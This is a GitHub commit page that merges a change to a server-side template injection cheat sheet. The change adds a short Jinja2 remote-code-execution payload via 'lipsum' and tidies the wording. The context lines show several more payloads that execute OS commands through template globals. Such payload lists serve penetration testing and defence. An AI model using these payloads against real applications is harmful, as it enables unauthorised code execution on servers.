Merge pull request #642 from p0dalirius/patch-1

Adding Jinja2 RCE through lipsum in Templates
swisskyrepo · May 9, 2023 · 8d2c30e · 8d2c30e
2 parents 5af6a23 + 9c2b040
commit 8d2c30e
Showing 1 changed file with 9 additions and 1 deletion.
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
@@ -563,7 +563,7 @@ But when `__builtins__` is filtered, the following payloads are context-free, an
 {{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
 ```
 
-We can use these shorter payloads (this is the shorter payloads known yet):
+We can use these shorter payloads:
 
 ```python
 {{ cycler.__init__.__globals__.os.popen('id').read() }}
@@ -573,6 +573,14 @@ We can use these shorter payloads (this is the shorter payloads known yet):
 
 Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/
 
+With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a path to the `os` module from `lipsum`. This is the shortest payload known to achieve RCE in a Jinja2 template:
+
+```python
+{{ lipsum.__globals__.["os"].popen('id').read() }}
+```
+
+Source: https://twitter.com/podalirius_/status/1655970628648697860
+
 #### Exploit the SSTI by calling subprocess.Popen
 
 :warning: the number 396 will vary depending of the application.